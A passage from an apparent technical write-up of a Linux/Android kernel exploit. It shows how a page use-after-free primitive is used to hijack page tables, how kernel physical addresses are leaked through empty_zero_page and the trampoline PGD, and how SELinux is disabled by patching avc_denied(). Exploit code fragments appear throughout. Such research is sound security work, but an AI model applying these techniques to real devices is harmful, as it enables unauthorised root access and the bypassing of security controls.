    <span class="k">struct</span> <span class="n">slab</span> <span class="o">*</span><span class="n">slab</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">kmem_cache</span> <span class="o">*</span><span class="n">s</span><span class="p">;</span>
    <span class="kt">void</span> <span class="o">*</span><span class="n">x</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">object</span><span class="p">;</span>

    <span class="c1">// [...]</span>
    <span class="n">folio</span> <span class="o">=</span> <span class="n">virt_to_folio</span><span class="p">(</span><span class="n">object</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="o">!</span><span class="n">folio_test_slab</span><span class="p">(</span><span class="n">folio</span><span class="p">)))</span> <span class="p">{</span>
        <span class="n">free_large_kmalloc</span><span class="p">(</span><span class="n">folio</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">object</span><span class="p">);</span> <span class="c1">// [1]</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The function <code class="language-plaintext highlighter-rouge">free_large_kmalloc()</code> only raises a warning if the target object is located in an order-0 page [2]. Execution then continues, and the function eventually calls <code class="language-plaintext highlighter-rouge">folio_put()</code> [3] to release the page.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">free_large_kmalloc</span><span class="p">(</span><span class="k">struct</span> <span class="n">folio</span> <span class="o">*</span><span class="n">folio</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">object</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">order</span> <span class="o">=</span> <span class="n">folio_order</span><span class="p">(</span><span class="n">folio</span><span class="p">);</span>

    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">WARN_ON_ONCE</span><span class="p">(</span><span class="n">order</span> <span class="o">==</span> <span class="mi">0</span><span class="p">))</span> <span class="c1">// [2]</span>
        <span class="n">pr_warn_once</span><span class="p">(</span><span class="s">"object pointer: 0x%p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">object</span><span class="p">);</span>

    <span class="c1">// [...]</span>
    <span class="n">__folio_clear_large_kmalloc</span><span class="p">(</span><span class="n">folio</span><span class="p">);</span>
    <span class="n">folio_put</span><span class="p">(</span><span class="n">folio</span><span class="p">);</span> <span class="c1">// [3]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>At this point, the pipe page is freed, leaving us with a powerful <strong>page UAF primitive</strong>. Awesome!</p>

<h3 id="35-hijack-page-table">3.5. Hijack Page Table</h3>

<h4 id="351-empty_zero_page">3.5.1. empty_zero_page</h4>

<p>We chose to use the page UAF primitive to hijack the page table, as this allows <strong>direct overwriting of kernel code</strong>. Besides the page table, one could also hijack shared libraries or other memory structures.</p>

<p>For my exploit, I used <code class="language-plaintext highlighter-rouge">0x80000000UL</code> as the base address, and its page table layout is as follows:</p>
<ul>
  <li>PT (bits 20–12): 0</li>
  <li>PD (bits 29–21): 0</li>
  <li>PDPT (bits 38–30): 2</li>
  <li>PML4 (bits 47–39): 0</li>
</ul>

<p>During initialization, I populated the first page. As a result, the kernel allocated the required PML4, PDPT, PD, and PT internally. This ensures that subsequent allocations only require <strong>new PT entries</strong>, rather than higher-level page table structures.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#define BASE_MMAP_ADDR ((void *)0x80000000UL)
</span><span class="n">SYSCHK</span><span class="p">(</span><span class="n">mmap</span><span class="p">(</span><span class="n">BASE_MMAP_ADDR</span><span class="p">,</span> <span class="mh">0x1000</span><span class="p">,</span> <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span> <span class="n">MAP_ANON</span> <span class="o">|</span> <span class="n">MAP_PRIVATE</span> <span class="o">|</span> <span class="n">MAP_POPULATE</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">));</span>
</code></pre></div></div>

<p>Once the page UAF was obtained, I populated multiple pages and readed the mapped memory to trigger faults in the <code class="language-plaintext highlighter-rouge">empty_zero_page</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">printf</span><span class="p">(</span><span class="s">"[+] spray pgtable</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">{</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">512</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="kt">void</span> <span class="o">*</span><span class="n">ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">BASE_MMAP_ADDR</span> <span class="o">+</span> <span class="n">i</span> <span class="o">*</span> <span class="mh">0x200000</span><span class="p">;</span>
        <span class="n">SYSCHK</span><span class="p">(</span><span class="n">mmap</span><span class="p">(</span><span class="n">ptr</span><span class="p">,</span> <span class="mh">0x1000</span><span class="p">,</span> <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span> <span class="n">MAP_ANON</span> <span class="o">|</span> <span class="n">MAP_PRIVATE</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">));</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="k">volatile</span> <span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">ptr</span><span class="p">)</span> <span class="n">printf</span><span class="p">(</span><span class="s">"owo</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">empty_zero_page</code> is a 0x1000-sized <strong>kernel variable</strong> filled entirely with zeros. It is used to avoid redundant anonymous memory allocations. This special page is installed by the page-fault handler whenever a fault is triggered by reading from an anonymous page.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="n">vm_fault_t</span> <span class="nf">do_anonymous_page</span><span class="p">(</span><span class="k">struct</span> <span class="n">vm_fault</span> <span class="o">*</span><span class="n">vmf</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="cm">/* Use the zero-page for reads */</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">vmf</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">FAULT_FLAG_WRITE</span><span class="p">)</span> <span class="o">&amp;&amp;</span>
            <span class="o">!</span><span class="n">mm_forbids_zeropage</span><span class="p">(</span><span class="n">vma</span><span class="o">-&gt;</span><span class="n">vm_mm</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">entry</span> <span class="o">=</span> <span class="n">pte_mkspecial</span><span class="p">(</span><span class="n">pfn_pte</span><span class="p">(</span><span class="n">my_zero_pfn</span><span class="p">(</span><span class="n">vmf</span><span class="o">-&gt;</span><span class="n">address</span><span class="p">),</span>
                        <span class="n">vma</span><span class="o">-&gt;</span><span class="n">vm_page_prot</span><span class="p">));</span>
        <span class="c1">// [...]</span>
        <span class="k">goto</span> <span class="n">setpte</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="c1">// [...]</span>
<span class="nl">setpte:</span>
    <span class="c1">// [...]</span>
    <span class="n">set_pte_at</span><span class="p">(</span><span class="n">vma</span><span class="o">-&gt;</span><span class="n">vm_mm</span><span class="p">,</span> <span class="n">vmf</span><span class="o">-&gt;</span><span class="n">address</span><span class="p">,</span> <span class="n">vmf</span><span class="o">-&gt;</span><span class="n">pte</span><span class="p">,</span> <span class="n">entry</span><span class="p">);</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>

<span class="cp">#define my_zero_pfn(addr)    page_to_pfn(ZERO_PAGE(addr))
</span>
<span class="cm">/*
 * ZERO_PAGE is a global shared page that is always zero: used
 * for zero-mapped memory areas etc..
 */</span>
<span class="k">extern</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">empty_zero_page</span><span class="p">[</span><span class="n">PAGE_SIZE</span> <span class="o">/</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)]</span>
    <span class="n">__visible</span><span class="p">;</span>
<span class="cp">#define ZERO_PAGE(vaddr) ((void)(vaddr),virt_to_page(empty_zero_page))
</span></code></pre></div></div>

<p>Since it resides in kernel data, we can use its physical address to <strong>calculate the physical address of the kernel text</strong>.</p>

<h4 id="352-trampoline-pgd">3.5.2. Trampoline PGD</h4>

<p>Even without using <code class="language-plaintext highlighter-rouge">empty_zero_page</code>, Linux still has some fixed physical addresses, and we can leak addresses from them.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@lts-6:/# <span class="nb">cat</span> /proc/iomem
00000000-00000fff : Reserved
00001000-0009fbff : System RAM
0009fc00-0009ffff : Reserved
000a0000-000bffff : PCI Bus 0000:00
000c0000-000c9bff : Video ROM
000ca000-000cadff : Adapter ROM
000cb000-000cb5ff : Adapter ROM
000f0000-000fffff : Reserved
<span class="c"># [...]</span>
</code></pre></div></div>

<p>In author’s exploit, one of the referenced addresses is <strong><code class="language-plaintext highlighter-rouge">0x9c000</code></strong>. This address corresponds to <code class="language-plaintext highlighter-rouge">real_mode_header-&gt;trampoline_pgd</code> [1], which is the PGD page table used in real mode.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="n">__init</span> <span class="nf">setup_real_mode</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">u64</span> <span class="o">*</span><span class="n">trampoline_pgd</span><span class="p">;</span>
    <span class="c1">// [...]</span>
    <span class="n">trampoline_pgd</span> <span class="o">=</span> <span class="p">(</span><span class="n">u64</span> <span class="o">*</span><span class="p">)</span> <span class="n">__va</span><span class="p">(</span><span class="n">real_mode_header</span><span class="o">-&gt;</span><span class="n">trampoline_pgd</span> <span class="cm">/* 0x9c000 */</span><span class="p">);</span> <span class="c1">// [1]</span>
    <span class="n">trampoline_pgd</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">trampoline_pgd_entry</span><span class="p">.</span><span class="n">pgd</span><span class="p">;</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Its first entry is initialized in the function <code class="language-plaintext highlighter-rouge">init_trampoline_kaslr()</code> [2], which allocates a page using <code class="language-plaintext highlighter-rouge">alloc_low_page()</code> [3].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="n">__init</span> <span class="nf">init_trampoline</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="k">else</span>
        <span class="n">init_trampoline_kaslr</span><span class="p">();</span> <span class="c1">// &lt;------------</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="n">__meminit</span> <span class="nf">init_trampoline_kaslr</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="n">pud_page_tramp</span> <span class="o">=</span> <span class="n">alloc_low_page</span><span class="p">();</span> <span class="c1">// [3]</span>

    <span class="c1">// [...]</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="n">trampoline_pgd_entry</span> <span class="o">=</span>
            <span class="n">__pgd</span><span class="p">(</span><span class="n">_KERNPG_TABLE</span> <span class="o">|</span> <span class="n">__pa</span><span class="p">(</span><span class="n">pud_page_tramp</span><span class="p">));</span> <span class="c1">// [2]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The page is allocated internally from the PGT buffer.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="kt">void</span> <span class="o">*</span><span class="nf">alloc_low_page</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">return</span> <span class="n">alloc_low_pages</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> <span class="c1">// &lt;------------</span>
<span class="p">}</span>

<span class="n">__ref</span> <span class="kt">void</span> <span class="o">*</span><span class="nf">alloc_low_pages</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">num</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="n">pfn</span> <span class="o">=</span> <span class="n">pgt_buf_end</span><span class="p">;</span>
        <span class="n">pgt_buf_end</span> <span class="o">+=</span> <span class="n">num</span><span class="p">;</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The PGT buffer is initialized in <code class="language-plaintext highlighter-rouge">early_alloc_pgt_buf()</code>, and its memory comes from <code class="language-plaintext highlighter-rouge">extend_brk()</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span>  <span class="n">__init</span> <span class="nf">early_alloc_pgt_buf</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">tables</span> <span class="o">=</span> <span class="n">INIT_PGT_BUF_SIZE</span><span class="p">;</span>
    <span class="n">phys_addr_t</span> <span class="n">base</span><span class="p">;</span>

    <span class="n">base</span> <span class="o">=</span> <span class="n">__pa</span><span class="p">(</span><span class="n">extend_brk</span><span class="p">(</span><span class="n">tables</span><span class="p">,</span> <span class="n">PAGE_SIZE</span><span class="p">));</span> <span class="c1">// &lt;------------</span>

    <span class="n">pgt_buf_start</span> <span class="o">=</span> <span class="n">base</span> <span class="o">&gt;&gt;</span> <span class="n">PAGE_SHIFT</span><span class="p">;</span>
    <span class="n">pgt_buf_end</span> <span class="o">=</span> <span class="n">pgt_buf_start</span><span class="p">;</span>
    <span class="n">pgt_buf_top</span> <span class="o">=</span> <span class="n">pgt_buf_start</span> <span class="o">+</span> <span class="p">(</span><span class="n">tables</span> <span class="o">&gt;&gt;</span> <span class="n">PAGE_SHIFT</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="o">*</span> <span class="n">__init</span> <span class="nf">extend_brk</span><span class="p">(</span><span class="kt">size_t</span> <span class="n">size</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">align</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">size_t</span> <span class="n">mask</span> <span class="o">=</span> <span class="n">align</span> <span class="o">-</span> <span class="mi">1</span><span class="p">;</span>
    <span class="kt">void</span> <span class="o">*</span><span class="n">ret</span><span class="p">;</span>

    <span class="n">_brk_end</span> <span class="o">=</span> <span class="p">(</span><span class="n">_brk_end</span> <span class="o">+</span> <span class="n">mask</span><span class="p">)</span> <span class="o">&amp;</span> <span class="o">~</span><span class="n">mask</span><span class="p">;</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">_brk_end</span><span class="p">;</span>
    <span class="n">_brk_end</span> <span class="o">+=</span> <span class="n">size</span><span class="p">;</span>
    <span class="n">memset</span><span class="p">(</span><span class="n">ret</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">size</span><span class="p">);</span>
    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">_brk_start</span> <span class="o">=</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)</span><span class="n">__brk_base</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">_brk_end</span>   <span class="o">=</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)</span><span class="n">__brk_base</span><span class="p">;</span>
</code></pre></div></div>

<p>Finally, we can see that the brk area is <strong>actually kernel data</strong>. This explains why the physical address <code class="language-plaintext highlighter-rouge">0x9c000</code> contains another physical address located around the kernel base.</p>

<pre><code class="language-asm">// arch/x86/kernel/vmlinux.lds.S

// [...]
. = ALIGN(PAGE_SIZE);
.brk : AT(ADDR(.brk) - LOAD_OFFSET) {
    __brk_base = .;
    . += 64 * 1024;        /* 64k alignment slop space */
    *(.bss..brk)        /* areas brk users have reserved */
    __brk_limit = .;
}
// [...]
</code></pre>

<h3 id="36-overwrite-kernel-function">3.6. Overwrite Kernel Function</h3>

<p>Now we have the physical addrss of kernel text and can fully control page table, so we can overwrite the kernel function!</p>

<p>To archieve full root, we need to know mitigations on Android and try to bypass them.</p>

<h4 id="361-selinux">3.6.1. SELinux</h4>

<p>SELinux is a rule-based framework for enforcing mandatory access control (MAC) security policies. Rules define how subjects (domains) can interact with objects (types), specifying permissions and constraints. Common rule types include:</p>
<ul>
  <li><strong>allow</strong>: A whitelist rule permitting a subject (domain) to perform specific operations on an object.</li>
  <li><strong>auditallow, dontaudit, neverallow</strong>: Control auditing behavior, specifying whether an access attempt is logged, ignored, or explicitly prohibited.</li>
  <li><strong>type_transition</strong>: Specifies the default type assigned to a newly created object in a given context.</li>
  <li><strong>type_change</strong>: Defines the type to assign when relabeling (changing the type) of an existing object.</li>
  <li>… and others.</li>
</ul>

<p>An <strong>access vector (AV)</strong> defines which permissions a subject (process or domain) has on a particular object (file, device, socket, etc.). The general form is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;subject&gt; &lt;object&gt;:&lt;class&gt; { &lt;permissions&gt; };
</code></pre></div></div>
<ul>
  <li><strong>subject</strong>: The domain (process context, e.g., <code class="language-plaintext highlighter-rouge">untrusted_app</code>).</li>
  <li><strong>object</strong>: The type of the target resource (e.g., <code class="language-plaintext highlighter-rouge">gxp_device</code>).</li>
  <li><strong>class</strong>: The object class (e.g., <code class="language-plaintext highlighter-rouge">file</code>, <code class="language-plaintext highlighter-rouge">dir</code>, <code class="language-plaintext highlighter-rouge">chr_file</code>, <code class="language-plaintext highlighter-rouge">socket</code>).</li>
  <li><strong>permissions</strong>: The permitted operations (e.g., <code class="language-plaintext highlighter-rouge">read</code>, <code class="language-plaintext highlighter-rouge">write</code>, <code class="language-plaintext highlighter-rouge">open</code>).</li>
</ul>

<p>For example,</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>allow untrusted_app gxp_device:chr_file { read write open };
</code></pre></div></div>

<p>This is an <strong>allow</strong> rule. It grants processes running in the <strong>domain <code class="language-plaintext highlighter-rouge">untrusted_app</code></strong> permission to perform <strong><code class="language-plaintext highlighter-rouge">read</code>, <code class="language-plaintext highlighter-rouge">write</code>, and <code class="language-plaintext highlighter-rouge">open</code></strong> operations on the <strong>object <code class="language-plaintext highlighter-rouge">gxp_device</code></strong>, which belongs to the <strong><code class="language-plaintext highlighter-rouge">chr_file</code> class</strong>.</p>

<p>With SELinux enabled, <strong>even the root user cannot access all resources</strong>. Therefore, it is necessary to disable it in order to bypass these restrictions.</p>

<p>But how does SELinux work? Let’s look at the kernel implementation.</p>

<p>The kernel function registers <strong>security hooks</strong> (functions prefixed with <code class="language-plaintext highlighter-rouge">security_</code>) to check permissions in almost every operation. For example, consider <code class="language-plaintext highlighter-rouge">SYS_fork</code>. During the process duplication, the function <code class="language-plaintext highlighter-rouge">security_task_alloc()</code> is invoked to perform a security check.</p>

<p>This function then calls <code class="language-plaintext highlighter-rouge">call_int_hook()</code> to iterate over <code class="language-plaintext highlighter-rouge">&amp;security_hook_heads.task_alloc</code> and invoke the registered SELinux hook <code class="language-plaintext highlighter-rouge">selinux_task_alloc()</code>, which validates whether the process has sufficient permissions to create a copy of itself.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">security_task_alloc</span><span class="p">(</span><span class="k">struct</span> <span class="n">task_struct</span> <span class="o">*</span><span class="n">task</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">clone_flags</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">int</span> <span class="n">rc</span> <span class="o">=</span> <span class="n">lsm_task_alloc</span><span class="p">(</span><span class="n">task</span><span class="p">);</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">rc</span><span class="p">)</span>
        <span class="k">return</span> <span class="n">rc</span><span class="p">;</span>
    <span class="n">rc</span> <span class="o">=</span> <span class="n">call_int_hook</span><span class="p">(</span><span class="n">task_alloc</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">task</span><span class="p">,</span> <span class="n">clone_flags</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">rc</span><span class="p">))</span>
        <span class="n">security_task_free</span><span class="p">(</span><span class="n">task</span><span class="p">);</span>
    <span class="k">return</span> <span class="n">rc</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">int</span> <span class="nf">selinux_task_alloc</span><span class="p">(</span><span class="k">struct</span> <span class="n">task_struct</span> <span class="o">*</span><span class="n">task</span><span class="p">,</span>
                  <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">clone_flags</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">u32</span> <span class="n">sid</span> <span class="o">=</span> <span class="n">current_sid</span><span class="p">();</span>

    <span class="k">return</span> <span class="n">avc_has_perm</span><span class="p">(</span><span class="o">&amp;</span><span class="n">selinux_state</span><span class="p">,</span>
                <span class="n">sid</span><span class="p">,</span> <span class="n">sid</span><span class="p">,</span> <span class="n">SECCLASS_PROCESS</span><span class="p">,</span> <span class="n">PROCESS__FORK</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Within <code class="language-plaintext highlighter-rouge">avc_has_perm()</code>, the function <code class="language-plaintext highlighter-rouge">avc_has_perm_noaudit()</code> is called to perform the permission check, and <code class="language-plaintext highlighter-rouge">avc_audit()</code> is called to determine whether an audit message should be generated.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">avc_has_perm</span><span class="p">(</span><span class="k">struct</span> <span class="n">selinux_state</span> <span class="o">*</span><span class="n">state</span><span class="p">,</span> <span class="n">u32</span> <span class="n">ssid</span><span class="p">,</span> <span class="n">u32</span> <span class="n">tsid</span><span class="p">,</span> <span class="n">u16</span> <span class="n">tclass</span><span class="p">,</span>
         <span class="n">u32</span> <span class="n">requested</span><span class="p">,</span> <span class="k">struct</span> <span class="n">common_audit_data</span> <span class="o">*</span><span class="n">auditdata</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">av_decision</span> <span class="n">avd</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">rc</span><span class="p">,</span> <span class="n">rc2</span><span class="p">;</span>

    <span class="n">rc</span> <span class="o">=</span> <span class="n">avc_has_perm_noaudit</span><span class="p">(</span><span class="n">state</span><span class="p">,</span> <span class="n">ssid</span> <span class="cm">/* source/domain id */</span><span class="p">,</span>
                                     <span class="n">tsid</span> <span class="cm">/* target id */</span><span class="p">,</span>
                                     <span class="n">tclass</span> <span class="cm">/* target class */</span><span class="p">,</span>
                                     <span class="n">requested</span> <span class="cm">/* operation */</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">avd</span><span class="p">);</span>

    <span class="n">rc2</span> <span class="o">=</span> <span class="n">avc_audit</span><span class="p">(</span><span class="n">state</span><span class="p">,</span> <span class="n">ssid</span><span class="p">,</span> <span class="n">tsid</span><span class="p">,</span> <span class="n">tclass</span><span class="p">,</span> <span class="n">requested</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">avd</span><span class="p">,</span> <span class="n">rc</span><span class="p">,</span>
            <span class="n">auditdata</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">rc2</span><span class="p">)</span>
        <span class="k">return</span> <span class="n">rc2</span><span class="p">;</span>
    <span class="k">return</span> <span class="n">rc</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">avc_has_perm_noaudit()</code> first looks up the corresponding rule from the <strong>Access Vector Cache (AVC)</strong>. If the requested operations are not in the allow list [1], <code class="language-plaintext highlighter-rouge">avc_denied()</code> [2] is called to perform further checks.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kr">inline</span> <span class="kt">int</span> <span class="nf">avc_has_perm_noaudit</span><span class="p">(</span><span class="k">struct</span> <span class="n">selinux_state</span> <span class="o">*</span><span class="n">state</span><span class="p">,</span>
                <span class="n">u32</span> <span class="n">ssid</span><span class="p">,</span> <span class="n">u32</span> <span class="n">tsid</span><span class="p">,</span>
                <span class="n">u16</span> <span class="n">tclass</span><span class="p">,</span> <span class="n">u32</span> <span class="n">requested</span><span class="p">,</span>
                <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">flags</span><span class="p">,</span>
                <span class="k">struct</span> <span class="n">av_decision</span> <span class="o">*</span><span class="n">avd</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">avc_node</span> <span class="o">*</span><span class="n">node</span><span class="p">;</span>

    <span class="c1">// [...]</span>
    <span class="n">node</span> <span class="o">=</span> <span class="n">avc_lookup</span><span class="p">(</span><span class="n">state</span><span class="o">-&gt;</span><span class="n">avc</span><span class="p">,</span> <span class="n">ssid</span><span class="p">,</span> <span class="n">tsid</span><span class="p">,</span> <span class="n">tclass</span><span class="p">);</span>
    
    <span class="c1">// [...]</span>
    <span class="n">denied</span> <span class="o">=</span> <span class="n">requested</span> <span class="o">&amp;</span> <span class="o">~</span><span class="p">(</span><span class="n">avd</span><span class="o">-&gt;</span><span class="n">allowed</span><span class="p">);</span> <span class="c1">// [1]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">denied</span><span class="p">))</span>
        <span class="n">rc</span> <span class="o">=</span> <span class="n">avc_denied</span><span class="p">(</span><span class="n">state</span><span class="p">,</span> <span class="n">ssid</span><span class="p">,</span> <span class="n">tsid</span><span class="p">,</span> <span class="n">tclass</span><span class="p">,</span> <span class="n">requested</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="c1">// [2]</span>
                <span class="n">flags</span><span class="p">,</span> <span class="n">avd</span><span class="p">);</span>

    <span class="c1">// [...]</span>
    <span class="k">return</span> <span class="n">rc</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Since the SELinux is always in enforcing mode, and the AV domain is typically not in permissive mode, the check fails and returns <code class="language-plaintext highlighter-rouge">-EACCES</code> [3].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="n">noinline</span> <span class="kt">int</span> <span class="nf">avc_denied</span><span class="p">(</span><span class="k">struct</span> <span class="n">selinux_state</span> <span class="o">*</span><span class="n">state</span><span class="p">,</span>
                   <span class="n">u32</span> <span class="n">ssid</span><span class="p">,</span> <span class="n">u32</span> <span class="n">tsid</span><span class="p">,</span>
                   <span class="n">u16</span> <span class="n">tclass</span><span class="p">,</span> <span class="n">u32</span> <span class="n">requested</span><span class="p">,</span>
                   <span class="n">u8</span> <span class="n">driver</span><span class="p">,</span> <span class="n">u8</span> <span class="n">xperm</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">flags</span><span class="p">,</span>
                   <span class="k">struct</span> <span class="n">av_decision</span> <span class="o">*</span><span class="n">avd</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">AVC_STRICT</span><span class="p">)</span>
        <span class="k">return</span> <span class="o">-</span><span class="n">EACCES</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">enforcing_enabled</span><span class="p">(</span><span class="n">state</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="c1">// [3]</span>
        <span class="o">!</span><span class="p">(</span><span class="n">avd</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">AVD_FLAGS_PERMISSIVE</span><span class="p">))</span>
        <span class="k">return</span> <span class="o">-</span><span class="n">EACCES</span><span class="p">;</span>

    <span class="c1">// [...]</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>To disable SELinux, the most effective way is to <strong>patch <code class="language-plaintext highlighter-rouge">avc_denied()</code> so that it always returns zero</strong>, meaning the permission check always succeeds. The relevant part of the exploit is shown below:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">printf</span><span class="p">(</span><span class="s">"[+] overwrite avc_denied: 0x%016lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">avc_denied_w_pte</span><span class="p">);</span>
<span class="p">{</span>
    <span class="c1">// xor rax, rax ; ret</span>
